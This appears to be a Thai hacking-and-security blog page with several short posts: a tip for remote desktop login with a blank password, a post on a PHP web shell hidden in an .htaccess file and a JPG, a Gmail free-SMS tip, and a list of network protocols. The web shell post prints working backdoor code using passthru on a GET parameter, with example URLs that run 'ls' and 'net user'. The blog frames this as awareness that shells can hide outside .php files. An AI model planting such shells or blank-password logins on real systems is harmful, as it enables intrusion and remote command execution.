ตั้งค่าสำหรับ User ที่ Remote Connect เข้ามา
คลิกที่ > select Remote Users   > Add > Advanced > find now > Administrator

=========================================================
แนะนำ....หากเราศึกษาการ "แฮกแก้ไขค่า Registry" ได้อย่างเข้าถึงแล้ว
การเซ็ตความปลอดภัยหรือสิทธิ์ต่างๆในระบบ หรือภายในบริษัท หรือ องค์กร จะสะดวกมากขึ้น
เนื่องจากบางครั้งเราไม่จำเป็นต้องลงโปรแกรมหรือทำอะไรยุ่งยาก
แต่ใช้การแก้ไขค่า Registry ก็สามารถทำได้หลากหลายอย่างมากๆเช่นกัน

========================================================
Source : http://www.mydigitallife.info/trick-to-enable-and-allow-windows-xp-and-vista-remote-desktop-login-without-password-or-with-blank-null-password/
========================================================
Read more

แฮกเกอร์ยังสามารถแฮกเว็บได้ แม้ลบไฟล์ Shell ที่เป็น .php ออกไปหมดแล้วก็ตาม

แฮกเกอร์ ยังสามารถ "แฮกเว็บ" ได้ต่อให้ลบ Shell ที่เป็น .php หรือ "ลบไฟล์แปลกปลอมบนเว็บ" ออกไปหมดแล้วก็ตาม

hacker

สวัสดีครับ =/\=
หลังจากหายกันไปนาน...หลังจากไปซนกันมาพักใหญ่ได้เจออีกเทคนิคหนึ่ง
ที่เป็นการซ่อนโค้ดสำหรับ execute หรือเรียกใช้งานคำสั่งของแต่ละ Os command
ไว้ในไฟล์ .htaccess ซะเลย  หลายๆคนทราบดีอยู่แล้วว่า .htaccess นี้การใช้งานทำได้หลายอย่างมาก
แต่ที่รู้ๆกันอยู่ในไทยนั้นนิยมเขียนไว้เพื่อป้องกันแฮกเกอร์ จากช่องโหว่ต่างๆได้ในระดับหนึ่ง

กลับมาเรื่องของเราดีกว่าครับ...บทความขอเขียนเพื่อเป็นข้อชี้ชัดเจนเรื่องไฟล์ Shell
ว่าไม่ได้มีแค่รูปแบบไฟล์ .php และก็ยังแฝงอยู่ในไฟล์อื่นๆได้อีกด้วยครับ

สำหรับคนที่ยังไม่รู้ว่า Shell คืออะไร ?
(http://basic-hack.blogspot.com/2012/05/shell.html)

ที่หลายๆเว็บที่โดนแฮกและมักจะมีไฟล์หอย เช่น c99.php ขึ้นมาบนเว็บหรืออาจจะเป็นชื่ออื่นๆ
หลายคนก็อาจเข้าใจว่า Shell ต้องเป็น .php ซะเสมอไป ...แต่นั่นเป็นเพียงแค่เปลือก
ที่แฮกเกอร์มือใหม่หลายๆคนอาจนำมาใช้เพื่อความสะดวกแค่นั้นครับ
  
โค้ดนี้ได้พบเจอซ่อนในไฟล์  .htaccess บน www.XXXX.com หนึ่ง

<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?> 

บรรทัดสุดท้ายก็คือการใช้ฟังชั่น passthru เพื่อที่จะ
สามารถทำ Remote Code Execution ด้วย method get ได้นั่นเองครับ
และเมื่อ แฮกเกอร์ ต้องการใช้งาน

www.hacked-by-basic-hack.th/.htaccess?cmd=ls

สำหรับมือใหม่ ตรง ls นี้เราสามารถ Execute  คำสั่งเฉพาะสำหรับแต่ละ OS command ได้
จากตัวอย่าง ls เมื่อผม Enter URL นี้ก็จะหมายถึงการสั่งให้ แสดงแฟ้มข้อมูล ออกมาทางหน้าเว็บเบราเซอร์ของเรา เป็นต้น

จากการค้นคว้าเพิ่มเติม(อันตรายกว่าที่คิด..)

code in pic.jpg
<?php
        passthru($_GET['cmd']);
?>

และเมื่อแฮกเกอร์ต้องการใช้งาน
www.hacked-by-basic-hack.th/pic.jpg?cmd=net user

ขอจบบทความไว้เพียงเท่านี้ครับ

Secure For You
ak1- http://basic-hack.blogspot.com
facebook : https://www.facebook.com/ibasic.hack
Read more

ส่งข้อความSMSฟรี เข้ามือถือ DTAC, TRUE [วันละ50 SMS]

ใครว่าส่ง SMS ฟรี , เข้าส่งข้อความเข้ามือถือฟรี ไม่มีในโลกของฟรีไม่มีในโลก  

วันนี้จึงขอแนะนำบริการจาก Gmail สามารถส่ง SMS ฟรี เข้ามือถือ Truemove และ Dtac ได้วันละ 50 ข้อความฟรีๆ


อันดับแรกให้เข้าไปที่บัญชี Gmail มองในฝั่งซ้ายในช่องค้นหาแชทหรือ smsใส่เบอร์โทร ในรูปแบบ  +66xxxxxxxxx  
เสร็จแล้วกด ส่ง SMS ฟรี ได้ทันทีครับ

ตามรูป



ระบบจะส่ง SMS เข้ามาในมือถือ ในรูปแบบนี้
(ข้อความผมส่งไปว่้า TEST นะครับ)


สุดท้ายแล้วขอบคุณบริการดีดี ของ Gmail ครับ
บทความโดย Ak1 - basic-hack.blogspot ดอทคอม

Read more

ชนิดและการทำงานของ Protocol

อธิบายชนิดและการทำงานของ Protocol

คำถาม : ทำไมเราต้องรู้จัก protocol แต่ละตัว
ยกตัวอย่างสำหรับเด็ก Network ที่ต้องใช้ Sniffer 
หรือที่เรียกว่า การ ดักจับ packet , ข้อมูล , การติดต่อ บนเครือข่าย
เพื่อใช้ในการวิเคราะห์

นอกเหนือไปจากข้อมูลที่ได้จาก Protocol Analyzer แล้ว
สิ่งอื่นๆเช่น ความรู้พื้นฐานเกี่ยวกับเครือข่ายคอมพิวเตอร์ อีกมาก
ก็ควรมีเพื่อใช้ประกอบในการแก้ไขปัญหาด้วยเช่นกัน

1. Protocal ARP   จะทำหน้าที่ในการเปลี่ยนหมายเลข IP ให้เป็นหมายเลย Mac Address
2. Protocal RARP จะทำหน้าที่ในการแปลงหมายเลข Mac Address บนการ์ดเครือข่ายให้เป็นหมายเลข IP
3. Protocal ICMP ใช้สำหรับรายงานข้อผิดพลาดไปยัง Host ฝ่ายส่งรับทราบถึงปัญหาที่เกิดขึ้นในการส่งข้อมูล
4. Protocal IGMP จะสนับสนุนวิธีการส่งข้อมูลแบบ Multicast ด้วยการส่งข้อมูลชุดเดียวไปยังกลุ่มผู้รับปลายทางที่เป็นกลุ่มเครือข่ายเดียวกัน ทำให้ลด Band wide บนเครือข่ายได้มากเนื่องจากมีการส่งข้อมูลผ่านเครือข่ายเพียงครั้งเดียว
5. Protocal HTTP ใช้สำหรับเรียกดูเอกสารจาก WWW ซึ่งจัดเป็นตัวกลางในการสื่อสารในการรับส่งข้อมูลระหว่าง Browser และ Web Server
6. Protocal SMTP ใช้สำหรับการบริการไปรษณีย์อิเล็กทรอนิกส์บนอินเตอร์เน็ต
7. Protocal DNS เป็นส่วนที่ให้บริการแปลงชื่อ Domain ให้เป็นหมายเลย IP ซึ่งปกติ หมายเลข IP จะใช้ในการติดต่อ แต่หมายเลขอยากแก่การจดจำ จึงนิยมตั้งเป็นชื่ออักษรแทน โดย DNS จะใช้ชื่อที่พิมพ์ Map กับ IP เครื่องเพื่อติดต่อกับเครื่องในระบบเครือข่าย
8. Protocal DHCP ใช้กำหนดหรือจัดสรร IP ให้บนเครือข่ายซึ่งเป็น IP แบบไม่ตายตัว เมื่อเครื่อง Client ร้องขอ IP แต่ละครั้งอาจได้ IP ที่ไม่ซ้ำจากเลขเดิมก็ได้
9. Protocal TCP จะมีการสร้าง Connection ก่อนที่จะส่งข้อมูล สำหรับเส้นทางของ TCP จะมีการสร้าง Virtual Circuit ระหว่างฝั่งส่งและฝั่งรับ เพื่อให้เกิดความคล่องตัวในระหว่างการส่งข้อมูล
10 Protocal  UDP จะประกอบด้วยส่วนของ Header, Port Number ต้นทางและปลายทางขนาดความกว้างของข้อมูล และตัวควบคุมข้อผิดพลาด (Checksum) โดยPacket ที่เกิดขึ้นจาก UDP จะเรียกว่า User Datagram
11.Protocal  IP เป็นที่อยู่ของ Host ต้นทาง และปลายทาง รวมทั้งระบุที่อยู่การเชื่อมต่ออุปกรณ์บนระบบเครือข่าย
12.Protocal  PDU เป็นข้อมูลที่ส่งมาพร้อมกับ Segment Frame ของ TCP

Read more
X คอร์สเรียนแฮกเกอร์ - Hacker-Security (Online course and Ebook)